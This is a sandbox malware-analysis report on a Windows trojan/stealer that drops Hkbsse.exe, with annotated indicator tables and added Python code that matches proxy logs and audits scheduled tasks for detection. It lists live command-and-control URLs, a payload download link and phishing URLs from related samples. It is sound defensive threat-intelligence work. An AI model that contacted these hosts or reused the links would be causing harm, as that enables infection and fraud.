                  DNS: fellzobr.com
                  Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures
                  Started: file.exe; Hkbsse.exe

                file.exe (started from root)
                  Dropped: C:\Users\user\AppData\Local\...\Hkbsse.exe (PE32); C:\Users\user\...\Hkbsse.exe:Zone.Identifier (ASCII)
                  Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Contains functionality to inject code into remote processes
                  Started: Hkbsse.exe; WerFault.exe; WerFault.exe; 9 other processes

                Hkbsse.exe (started from root)
                  Network: 185.208.158.116 (ports 49725, 49731, 49737; SIMPLECARRER2IT, Switzerland); 89.23.103.42 (ports 49724, 49729, 49734; MAXITEL-ASRU, Russian Federation); 2 other IPs or domains
                  Dropped: C:\Users\user\AppData\Local\Temp\...\9f93a2 (PE32); C:\Users\user\AppData\Local\...\random[1].exe (PE32)
                  Started: WerFault.exe; WerFault.exe; WerFault.exe

                Hkbsse.exe (started by file.exe)
                  Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header)
                  Started: WerFault.exe

                WerFault.exe instances and the 9 other processes started by file.exe
                  Dropped: C:\ProgramData\Microsoft\...\Report.wer (Unicode), one per WerFault.exe instance; 6 other malicious files

Antivirus detection

Source | Detection | Scanner | Label
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches (reported for the three further scan groups)

Source | Detection | Scanner | Label
http://upx.sf.net | 0% | URL Reputation | safe
http://185.208.158.116/hb9IvshS01/index.phpq | 0% | Avira URL Cloud | safe
http://185.208.158.116/hb9IvshS01/index.php16 | 0% | Avira URL Cloud | safe
https://fellzobr.com/am/random.exem-urlencodedB | 0% | Avira URL Cloud | safe
http://185.209.162.226/hb9IvshS03/index.phpm | 0% | Avira URL Cloud | safe
https://fellzobr.com/am/random.exen | 0% | Avira URL Cloud | safe
https://fellzobr.com/ | 0% | Avira URL Cloud | safe
https://fellzobr.com/am/random.exe | 0% | Avira URL Cloud | safe
http://185.209.162.226/hb9IvshS03/index.php | 0% | Avira URL Cloud | safe
http://185.208.158.116/hb9IvshS01/index.php | 0% | Avira URL Cloud | safe
http://89.23.103.42/hb9IvshS02/index.phpj8 | 0% | Avira URL Cloud | safe
http://185.208.158.116/hb9IvshS01/index.phpd | 0% | Avira URL Cloud | safe
http://89.23.103.42/hb9IvshS02/index.php | 0% | Avira URL Cloud | safe

The 0% / "safe" verdicts only mean the URLs were unlisted at scan time, not that they are benign: the contacted-URL table below marks the three index.php endpoints as malicious and the behavior graph shows Hkbsse.exe connecting to their hosts. Entries that end in stray characters (...phpq, ...php16, ...exem-urlencodedB and similar) are strings recovered from process memory; the forms without the suffix are the actual URLs.
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
fellzobr.com | 188.114.96.3 | true | false | | unknown
Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://185.208.158.116/hb9IvshS01/index.php | true | Avira URL Cloud: safe | unknown
https://fellzobr.com/am/random.exe | false | Avira URL Cloud: safe | unknown
http://185.209.162.226/hb9IvshS03/index.php | true | Avira URL Cloud: safe | unknown
http://89.23.103.42/hb9IvshS02/index.php | true | Avira URL Cloud: safe | unknown
URLs found in memory and dropped files

Name | Source | Malicious | Antivirus Detection | Reputation
http://89.23.103.42/hb9IvshS02/index.phpj8 | Hkbsse.exe, 00000021.00000002.2879731701.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.208.158.116/hb9IvshS01/index.phpq | Hkbsse.exe, 00000021.00000002.2880475527.0000000005820000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fellzobr.com/am/random.exem-urlencodedB | Hkbsse.exe, 00000021.00000002.2879731701.0000000002BD2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.209.162.226/hb9IvshS03/index.phpm | Hkbsse.exe, 00000021.00000002.2879731701.0000000002BED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://upx.sf.net | Amcache.hve.4.dr | false | URL Reputation: safe | unknown
https://fellzobr.com/ | Hkbsse.exe, 00000021.00000002.2879731701.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fellzobr.com/am/random.exen | Hkbsse.exe, 00000021.00000002.2879731701.0000000002BED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.208.158.116/hb9IvshS01/index.php16 | Hkbsse.exe, 00000021.00000002.2880475527.0000000005820000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.208.158.116/hb9IvshS01/index.phpd | Hkbsse.exe, 00000021.00000002.2879731701.0000000002C27000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
185.208.158.116 | unknown | Switzerland | 34888 | SIMPLECARRER2IT | true
89.23.103.42 | unknown | Russian Federation | 48687 | MAXITEL-ASRU | true
188.114.96.3 | fellzobr.com | European Union | 13335 | CLOUDFLARENETUS | false
185.209.162.226 | unknown | Netherlands | 14576 | HOSTING-SOLUTIONSUS | true
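The URL tables above mix clean indicators with memory-dump strings that carry extraction junk after the real path. The following is an added example for this page (not code from the Joe Sandbox report) that reduces the listed strings to a de-duplicated C2 set and matches web-proxy log lines against it. Its assumptions: the characters trailing the memory strings (...phpq, ...php16, ...exem-urlencodedB) are artefacts and are cut off; upx.sf.net is a packer reference rather than a contact and is excluded; and the numbered hb9IvshS0N gate path generalises the 01/02/03 paths the report shows. The proxy log lines are constructed.

```python
"""Normalise the URL indicators from this report and match them against
web-proxy log lines.  Added example; not part of the Joe Sandbox report.
Assumptions are marked in the comments.  The proxy log is constructed."""
import re
from urllib.parse import urlsplit

# URL strings exactly as the report lists them (URL scan table plus the
# strings recovered from Hkbsse.exe memory dumps).
REPORTED_URLS = [
    "http://upx.sf.net",
    "http://185.208.158.116/hb9IvshS01/index.phpq",
    "http://185.208.158.116/hb9IvshS01/index.php16",
    "https://fellzobr.com/am/random.exem-urlencodedB",
    "http://185.209.162.226/hb9IvshS03/index.phpm",
    "https://fellzobr.com/am/random.exen",
    "https://fellzobr.com/",
    "https://fellzobr.com/am/random.exe",
    "http://185.209.162.226/hb9IvshS03/index.php",
    "http://185.208.158.116/hb9IvshS01/index.php",
    "http://89.23.103.42/hb9IvshS02/index.phpj8",
    "http://185.208.158.116/hb9IvshS01/index.phpd",
    "http://89.23.103.42/hb9IvshS02/index.php",
]

EXCLUDED_HOSTS = {"upx.sf.net"}  # assumption: packer homepage string, not C2

# Keep the path up to and including the last .php / .exe; drop what follows
# (assumption: the tail is string-extraction junk from the memory dump).
_PATH_TAIL = re.compile(r"^(.*\.(?:php|exe))[^/]*$", re.IGNORECASE)

# Assumption: numbered gate paths of the form /hb9IvshS0N/index.php.
C2_PATH_PATTERN = re.compile(r"^/hb9IvshS0\d/index\.php$")


def canonical(url: str) -> str:
    """Return scheme://host/path with extraction junk removed from the path."""
    parts = urlsplit(url.strip())
    m = _PATH_TAIL.match(parts.path)
    path = m.group(1) if m else (parts.path or "/")
    return f"{parts.scheme.lower()}://{parts.netloc.lower()}{path}"


def build_iocs(urls=REPORTED_URLS):
    """Return (hosts, urls): de-duplicated indicators after normalisation."""
    clean = set()
    for u in urls:
        c = canonical(u)
        if urlsplit(c).hostname in EXCLUDED_HOSTS:
            continue
        clean.add(c)
    hosts = {urlsplit(c).hostname for c in clean}
    return hosts, clean


# Constructed proxy log lines: time client method url status
PROXY_LOG = [
    "17:36:01 10.0.0.25 POST http://185.208.158.116/hb9IvshS01/index.php 200",
    "17:36:02 10.0.0.25 GET https://fellzobr.com/am/random.exe 200",
    "17:36:05 10.0.0.31 GET https://www.example.org/index.php 200",
    "17:36:09 10.0.0.25 POST http://89.23.103.42/hb9IvshS02/index.php 200",
    "17:36:12 10.0.0.40 POST http://203.0.113.9/hb9IvshS04/index.php 200",
]


def match_proxy_log(lines, iocs=None):
    """Return (client, canonical_url, reason) per line that hits an indicator.

    reason: "url" for an exact indicator, "host" for a known host on an
    unlisted path, "path-pattern" for the gate path on an unknown host."""
    hosts, urls = iocs if iocs is not None else build_iocs()
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue  # malformed line: skip rather than guess
        client, url = fields[1], fields[3]
        c = canonical(url)
        parts = urlsplit(c)
        if c in urls:
            hits.append((client, c, "url"))
        elif parts.hostname in hosts:
            hits.append((client, c, "host"))
        elif C2_PATH_PATTERN.match(parts.path):
            hits.append((client, c, "path-pattern"))
    return hits


if __name__ == "__main__":
    for hit in match_proxy_log(PROXY_LOG):
        print(*hit)
```

The "path-pattern" reason is deliberately reported separately from exact matches: it fires on hosts the report never saw, so it is a hunting lead to confirm, not a blocklist entry.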
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1470923
Start date and time: 2024-07-10 17:34:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 41
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@19/66@1/4 (score 100; trojan, spyware, evasion tags; 19 processes / 66 dropped files; 1 domain / 4 IPs)
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 32
• Number of non-executed functions: 390
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.182.143.212, 40.127.169.103, 20.3.187.198, 40.68.123.157, 52.165.164.15
• Excluded domains from analysis (whitelisted): client.wns.windows.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Some HTTPS proxied raw data packets have been limited to 10 per session; view the PCAPs for the complete data
• VT rate limit hit for: file.exe

Note that WerFault.exe is on the whitelisted-process list while the behavior graph shows it being spawned repeatedly by both file.exe and Hkbsse.exe: the crashes themselves are recorded (see the Report.wer files under dropped files), but WerFault's own behavior was not traced.
Timeline

Time | Type | Description
11:35:13 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
11:36:01 | API Interceptor | 86x Sleep call for process: Hkbsse.exe modified
17:34:59 | Task Scheduler | Run new task: Hkbsse, path: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe

The two API Interceptor rows use a different clock than the Task Scheduler row and the analysis start time (17:34:07 +02:00); the values are reproduced as the report shows them.
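The Task Scheduler row is the persistence mechanism: a task named Hkbsse whose action is an executable in a per-user temp directory. The following added example (not code from the Joe Sandbox report) audits Scheduled Task definitions in the Task Scheduler XML schema and flags any Exec action whose command runs from a user-writable location. The two task documents are constructed; the Hkbsse one uses the path from the timeline, and its trigger details are illustrative. On a live host the same function can be fed the files under C:\Windows\System32\Tasks, which use this schema, or the output of `schtasks /query /tn <name> /xml`.

```python
"""Audit Scheduled Task definitions for actions that run out of a
user-writable directory (the Hkbsse persistence recorded in this report).
Added example; not part of the Joe Sandbox report.  Both task XML documents
are constructed; the regex of user-writable directories is an assumption."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Directories a standard user can write to (assumption for the example).
USER_WRITABLE = re.compile(
    r"\\AppData\\Local\\Temp\\|\\AppData\\Roaming\\|\\ProgramData\\|\\Users\\Public\\",
    re.IGNORECASE,
)

# Constructed task using the path from the report's timeline; trigger is illustrative.
HKBSSE_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <StartBoundary>2024-07-10T17:34:59</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Users\\user\\AppData\\Local\\Temp\\3bca58cece\\Hkbsse.exe</Command>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign task for contrast: binary under %windir%.
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>%windir%\\system32\\cleanmgr.exe</Command>
      <Arguments>/autoclean</Arguments>
    </Exec>
  </Actions>
</Task>"""


def audit_task(name: str, xml_text: str):
    """Return one finding per Exec action whose command lives in a
    user-writable directory, with the task's trigger kinds for context."""
    root = ET.fromstring(xml_text)
    trig = root.find("t:Triggers", NS)
    triggers = [] if trig is None else [el.tag.split("}")[-1] for el in trig]
    findings = []
    for ex in root.findall("t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        args = ex.findtext("t:Arguments", default="", namespaces=NS).strip()
        if USER_WRITABLE.search(cmd):
            findings.append({"task": name, "command": cmd,
                             "arguments": args, "triggers": triggers})
    return findings


def audit_tasks(tasks):
    """tasks: iterable of (name, xml_text) pairs.  Returns all findings."""
    out = []
    for name, xml_text in tasks:
        out.extend(audit_task(name, xml_text))
    return out


if __name__ == "__main__":
    for f in audit_tasks([("Hkbsse", HKBSSE_TASK), ("CleanMgr", BENIGN_TASK)]):
        print(f["task"], "->", f["command"], f["triggers"])
```

The check keys on the command path rather than the task name because the name is attacker-chosen and changes between builds, while an executable launched from AppData\Local\Temp by a scheduled task is rare in a managed environment.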
Context: IP 188.114.96.3 seen in other analyses

Associated Sample / URL | Detection | Threat Name | Context
msconfig2.exe | malicious | Unknown | image.protonvpn.tw:8080/w
http://my.vrca.ca/_alcd/etr.ashx?etuid=B6EC5EC3-A3FA-4276-9728-F0F26D555086&p=https://microsoft.com@invstrategy.com/DocuSign.html | malicious | Unknown | my.vrca.ca/_alcd/etr.ashx?etuid=B6EC5EC3-A3FA-4276-9728-F0F26D555086&p=https://shareingdocuments.xyz/?befvctil
a82WdwCQnQOQf4b.exe | malicious | FormBook | www.txglobedev.com/dy13/?Dxop-=UBZ4HNkXnx40rj&ETU4dv=HpLmp5lsG/78ww7PQ+32zrfZcWzFIxQC5ZchK1XnBOU/XUWwZI280oPADrvVA1p9LOCI
HSOwUsZ7hs6Pm4m.exe | malicious | FormBook | www.9muyiutyt.online/39t8/
j2vPH4wfF2YxEja.exe | malicious | FormBook | www.9muyiutyt.online/39t8/
Sales Contract Document.bat.exe | malicious | FormBook | www.reignscents.com/45er/?Eb=7nIJSi4w4UDdAxj0bNOrDSFRryI6A1YsHs9hZ4wCm1ZqfM/zmtfDw2BRv7SKM2Ejw2h6&ohrPK2=Txo0d8
SHIPPING DOCS_pdf.exe | malicious | FormBook | www.evoolihubs.shop/fwdd/?Jj=kpS8&mv0D=K/pqHoAOWNF4P+w91QXSNI32+N7yog1OarJgSNepE9X9MW/JWlOOpIGlAtDTMDCyfqCkO2QB+3/EX24VIjMTes4MJP5Wyr3Pze4srZjnfJQNxaR/LCxeJK4=
DY3AojqquRfcmp5.exe | malicious | FormBook | www.artfulfusionhub.lat/qogc/
ZB1a1FVGs2.exe | malicious | DCRat, PureLog Stealer, zgRAT | 082650cm.nyashka.top/phpWppublic.php
DrgWPOUdyJ.exe | malicious | DCRat, PureLog Stealer, zgRAT | 082650cm.nyashka.top/phpWppublic.php

188.114.96.3 is a Cloudflare edge address shared by many unrelated sites, so this overlap says nothing about fellzobr.com itself.

Context: domains
No context
Context: ASNs seen in other analyses

ASN | Associated Sample / URL | Detection | Threat Name | Context
MAXITEL-ASRU | Launcher.exe | malicious | RedLine | 89.23.101.114
MAXITEL-ASRU | Dn7TBzLtf5.exe | malicious | RHADAMANTHYS | 89.23.103.235
MAXITEL-ASRU | a6zbacl43h.exe | malicious | DCRat | 89.23.97.228
MAXITEL-ASRU | https://5rve2bms.r.eu-west-1.awstrack.me/L0/https:%2F%2Fm.exactag.com%2Fai.aspx%3Ftc=d9279613bc40b07205bbd26a23a8d2e6b6b4f9%26url=%2568%2574%2574%2570%2525%2533%2541kenfong.com%252Fwinner%252F54799%252F%252FbGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==/1/0102019036933333-15818f27-6536-4f7c-94ff-9a04497bf567-000000/vIL5T4ixe-4lQyI6m0NlGqCl204=379 | malicious | HTMLPhisher | 89.23.108.32
MAXITEL-ASRU | D4FCA29AB627CC8EACE04367A04CC9919BFE2481523B2.exe | malicious | RedLine | 89.23.97.100
MAXITEL-ASRU | v6O2h78Mcp.exe | malicious | RedLine | 89.23.99.151
MAXITEL-ASRU | P8KA32mz7j.exe | malicious | RedLine | 89.23.107.91
MAXITEL-ASRU | Build.exe | malicious | Luca Stealer, Quasar | 89.23.96.113
MAXITEL-ASRU | uuVg5f1Gdn.exe | malicious | DCRat, PureLog Stealer, zgRAT | 89.23.98.112
MAXITEL-ASRU | https://www.bing.com/ck/a?!&&p=ec2690ecb5e8783cJmltdHM9MTcxMzA1MjgwMCZpZ3VpZD0zNmI1MjYyNC1hNGNjLTZiMzktMTE1Yi0zNjI3YTBjYzY1YmEmaW5zaWQ9NTIzMA&ptn=3&ver=2&hsh=3&fclid=36b52624-a4cc-6b39-115b-3627a0cc65ba&psq=site%3atragiangoc.com&u=a1aHR0cDovL3RyYWdpYW5nb2MuY29tL3Zhbi1jaHV5ZW4tZ2lhby1uaGFuLw | malicious | Unknown | 89.23.107.240
CLOUDFLARENETUS | https://ad.doubleclick.net/clk;265186560;90846275;t;pc=%255BTPAS_ID%255D?//oanlsiosnsas.com/owa/owa/?a=YWRlcmlja0BkZXJpY2tkZXJtYXRvbG9neS5jb20= | malicious | HTMLPhisher | 188.114.96.3
CLOUDFLARENETUS | https://m.exactag.com/ai.aspx?tc=d9282403bc40b07205bbd26a23a8d2e6b6b4f9&url=//mdroeieoiujhwoeurioksjmnshbenhuiowieudhsuikdiuheiuhd.pages.dev/#?email=cmlmQGRlby5teWZsb3JpZGEuY29t | malicious | Unknown | 104.21.26.140
CLOUDFLARENETUS | http://forticlient-ekj.pages.dev | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | http:///https:us02web.zoom.com@meeting.myapps.team/Mmjamshidi@peo.on.ca | malicious | Unknown | 104.17.3.184
CLOUDFLARENETUS | Quarantined Messages (4).zip | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | http://perryssteakhouse.com | malicious | Unknown | 104.18.208.173
CLOUDFLARENETUS | https://in.xero.com/wwkwvl0g2njip86pvix1xtkdqpe7u3z1vzdpadcn | malicious | Unknown | 162.247.243.29
CLOUDFLARENETUS | https://in.xero.com/otg9csffpxao6afkqb3xwrugoatdbpeduijycctc | malicious | Unknown | 162.247.243.29
CLOUDFLARENETUS | http://re-captha-version-3-280.buzz | malicious | Unknown | 104.18.31.76
CLOUDFLARENETUS | https://insights.zohorecruit.com/ck1/2d6f.390d3f0/7019ebb0-3ebe-11ef-862f-525400fa05f6/f38b5ed8c5f924ffdad91314e895461edf552999/2?e=6Z2i16fGFprpyUmAuNap7AXHpqy9V9l1Fa1NZauOTRI= | malicious | HTMLPhisher | 104.17.2.184
HOSTING-SOLUTIONSUS | http://tqwwwcom.ru/ | malicious | Unknown | 204.155.30.34
HOSTING-SOLUTIONSUS | xworm.exe | malicious | Unknown | 185.209.160.70
HOSTING-SOLUTIONSUS | Fb9Ff8L4T7 | malicious | RHADAMANTHYS | 185.209.160.99
HOSTING-SOLUTIONSUS | file.exe | malicious | Vidar, Xmrig | 185.209.162.208
HOSTING-SOLUTIONSUS | file.exe | malicious | Vidar, Xmrig | 185.209.162.208
HOSTING-SOLUTIONSUS | 05F1TC85Up.exe | malicious | DanaBot | 45.159.189.76
HOSTING-SOLUTIONSUS | 05F1TC85Up.exe | malicious | DanaBot | 45.159.189.76
HOSTING-SOLUTIONSUS | Green.exe | malicious | RedLine | 185.209.160.70
HOSTING-SOLUTIONSUS | Yellow.exe | malicious | RedLine | 185.209.160.70
HOSTING-SOLUTIONSUS | Blue.exe | malicious | RedLine | 185.209.160.70
SIMPLECARRER2IT | SecuriteInfo.com.Win64.MetasploitEncod-B.26495.10712.dll | malicious | Metasploit | 185.208.158.176
SIMPLECARRER2IT | JD40PL83OU.exe | malicious | Sliver | 185.208.158.176
SIMPLECARRER2IT | EERIE_EAVE.exe | malicious | Sliver | 185.208.158.176
SIMPLECARRER2IT | EERIE_EAVE.exe | malicious | Sliver | 185.208.158.176
SIMPLECARRER2IT | ok.exe | malicious | Sliver | 185.208.158.176
SIMPLECARRER2IT | 3lcoXbiq6u.exe | malicious | Unknown | 185.196.8.223
SIMPLECARRER2IT | oDlNf4iAZo.exe | malicious | Nightingale Stealer | 185.196.8.243
SIMPLECARRER2IT | pC8PWLyWY5.exe | malicious | Nightingale Stealer | 185.196.8.223
SIMPLECARRER2IT | http://appsjda.link/ | malicious | Unknown | 185.208.158.232
SIMPLECARRER2IT | kuQuRlbfuGOQVwhn | malicious | Unknown | 185.196.8.104

The three ASNs that host the malicious index.php endpoints (MAXITEL-ASRU, HOSTING-SOLUTIONSUS, SIMPLECARRER2IT) all recur in earlier analyses as infrastructure for stealers, RATs and C2 frameworks; CLOUDFLARENETUS is a CDN and its overlaps are not meaningful on their own.
Context: TLS fingerprint (JA3) 37f463bf4616ecd445d4a1937da06e19 seen in other analyses

Associated Sample / URL | Detection | Threat Name | Context
disputants stiftsfrkens.exe | malicious | Remcos, GuLoader | 188.114.96.3
file.exe | malicious | Vidar | 188.114.96.3
mMtzm139b0.exe | malicious | FormBook, GuLoader | 188.114.96.3
xGPd3v6Ag4.exe | malicious | GuLoader, Snake Keylogger | 188.114.96.3
SecuriteInfo.com.Trojan.GenericKD.73290600.32134.8584.exe | malicious | Unknown | 188.114.96.3
file.exe | malicious | Vidar | 188.114.96.3
pko_trans_details_20240710_105339#U00b7pdf.exe | malicious | Remcos | 188.114.96.3
file.exe | malicious | Vidar | 188.114.96.3
MTM-PO2411.exe | malicious | DarkCloud | 188.114.96.3
Arrival Notice_AWB 4560943391.vbe | malicious | FormBook, GuLoader | 188.114.96.3

This fingerprint is that of the Windows native TLS stack used by WinINet/WinHTTP clients, so it identifies the client library, not the malware family; the recurring 188.114.96.3 is again the shared Cloudflare edge.

Context: dropped files
No context
Dropped files

The ten entries below (the last cut off in the report) are Windows Error Reporting queue files written by WerFault.exe for crashes of file.exe and Hkbsse.exe. The report renders each preview as raw UTF-16; the previews are decoded to text here. In every record the middle field of TargetAppId carries the same 0000-prefixed SHA-1, e2b5131d03aa3bc56a004ba6debc6d57322e0691, whether the crashing image is file.exe or Hkbsse.exe, which confirms that the dropped Hkbsse.exe is a copy of the original sample.

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.7929476117617604
Encrypted: false
SSDEEP: 96:rabskAl38sJlqyoA7Jf7QXIDcQnc6rCcEhcw3rb+HbHgnoW6HeonsFE55EOyPuf3:WG38zJ056rwjFrzuiFaZ24IO8D
MD5: 5C29FFD1CC5690CBB70F1D3E9C431A32
SHA1: 647B8A218280FDC1B8AB78F3C8C60D8C496D96FE
SHA-256: 0855728707CA6C70C12EDCE96E9540C105936B142013BA2D03DA852C008975C6
SHA-512: B46B688B3995EA07F89E38B428E566F7148847372B67406880358B60BC56CDBD509D34EB24172D49FFF42BB73426DA86F6F92E542D5BD763792AF3E1AAAA55F1
Malicious: false
Preview (decoded):
  Version=1
  EventType=APPCRASH
  EventTime=133650993630075767
  ReportType=2
  Consent=1
  ReportIdentifier=9f5b82e8-ce51-43a9-801d-dd91116a0c8a
  IntegratorReportIdentifier=5f442350-3a9e-46ef-bb85-4f31dbc54de5
  Wow64Host=34404
  Wow64Guest=332
  NsAppName=Hkbsse.exe
  AppSessionGuid=00001b00-0001-0015-5487-68ddded2da01
  TargetAppId=W:000606363f573ccbe75bc447291f82a6fce700006d0f!0000e2b5131d03aa3bc56a004ba6debc6d57322e0691!Hkbsse.exe
  TargetAppVer=2024//07//10:13:44:46!0!Hkbsse.exe
  BootId=4294967295
  [preview truncated]

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.7794096273776813
Encrypted: false
SSDEEP: 96:veH13bsJlqyoA7Jf7QXIDcQnc6rCcEhcw3rb+HbHgnoW6HeonsFE55EOyPufPiDT:U3bzJ056rwjFezuiFaZ24IO8D
MD5: AAB3B66496C44D7A803344F7906C7EDA
SHA1: FD378229904B5A8D6CAAF58012A7CF3ED3996DA4
SHA-256: DCE0C23FBD82FF9451F63EC0560211821E9C56F72B22B262CAD7F1F9C48D308B
SHA-512: E5B4C652625A9750F2D5A1460EE24BD5EA1DF5D810D4FCE3AB631EF7DB5047126B100085FA875FF8FF7301B01A89B7D80F54ACC1CDB26393B3D72F2FD95EBB73
Malicious: false
Preview (decoded):
  Version=1
  EventType=APPCRASH
  EventTime=133650993624847666
  ReportType=2
  Consent=1
  ReportIdentifier=b2b37d5f-0640-4488-9632-ca2ff0bd9d99
  IntegratorReportIdentifier=34ce4a59-8e60-42d9-a3c7-586ef4ef019a
  Wow64Host=34404
  Wow64Guest=332
  NsAppName=Hkbsse.exe
  AppSessionGuid=00001b00-0001-0015-5487-68ddded2da01
  TargetAppId=W:000606363f573ccbe75bc447291f82a6fce700006d0f!0000e2b5131d03aa3bc56a004ba6debc6d57322e0691!Hkbsse.exe
  TargetAppVer=2024//07//10:13:44:46!0!Hkbsse.exe
  BootId=4294967295
  [preview truncated]

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.7790780872368542
Encrypted: false
SSDEEP: 96:i93JsJlqyoA7Jf7QXIDcQnc6rCcEhcw3rb+HbHgnoW6HeonsFE55EOyPufPiDzms:Y3JzJ056rwjFezuiFaZ24IO8D
MD5: B6106752852833BF9081A7A80993E676
SHA1: 677B8159E5B6E381C6EEB1D8F71608B53878555C
SHA-256: 32310A91C9C72D26AF92DA5FF235B86AE41066D9AA7B3BAF9B87A41A4D97DA23
SHA-512: BFA46530F9690337E4ED4DD8A4648C811F69910D6F777C2C2DE70B9A4B10BB45F1ADF11A7F30F5B7221E3FCDECC8DC1F4CBB00D1BD0D24569C68BDEB119695E2
Malicious: false
Preview (decoded):
  Version=1
  EventType=APPCRASH
  EventTime=133650993619344296
  ReportType=2
  Consent=1
  ReportIdentifier=b59aa1c2-6643-417c-bee6-2142bab64feb
  IntegratorReportIdentifier=0028e293-6fff-4d23-95a8-e594ddaa36a6
  Wow64Host=34404
  Wow64Guest=332
  NsAppName=Hkbsse.exe
  AppSessionGuid=00001b00-0001-0015-5487-68ddded2da01
  TargetAppId=W:000606363f573ccbe75bc447291f82a6fce700006d0f!0000e2b5131d03aa3bc56a004ba6debc6d57322e0691!Hkbsse.exe
  TargetAppVer=2024//07//10:13:44:46!0!Hkbsse.exe
  BootId=4294967295
  [preview truncated]

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.7869685712327685
Encrypted: false
SSDEEP: 96:iZh+o3WsJlqyos7Jf7QXIDcQrc6F/cEjcw31+HbHg/8BRTf3o8Fa9SAjOyWMmEbG:60o3WzF0lp52jJezuiFbZ24IO8D
MD5: A9568E2315F24F7BC71719F15DADA802
SHA1: B7BC4B080A548E28B90133881A73547F4F7D0CAA
SHA-256: FEFC8F8353248BCB4CA0C180340971CD81B18B03E545E96E9496EC8CFCC684FE
SHA-512: FFB90F06726A614875E2D925E4706F291542B2ADFED3A32E35027DA7763D5DA47AFD5D3B9659D621830712152B973133BC90D246E9C6CDDCA521507515CB8A82
Malicious: false
Preview (decoded):
  Version=1
  EventType=APPCRASH
  EventTime=133650993102638178
  ReportType=2
  Consent=1
  UploadTime=133650993106388169
  ReportStatus=655456
  ReportIdentifier=0519c252-299d-45d9-a860-e4961bc5b726
  IntegratorReportIdentifier=68bc733a-0d9c-4294-8eb6-436e32e4ef84
  Wow64Host=34404
  Wow64Guest=332
  NsAppName=Hkbsse.exe
  AppSessionGuid=00000784-0001-0015-25ed-6fbeded2da01
  TargetAppId=W:000606363f573ccbe75bc447291f82a6fce700006d0f!0000e2b5131d03aa3bc56a004ba6debc6d57322e0691!Hkbsse.exe
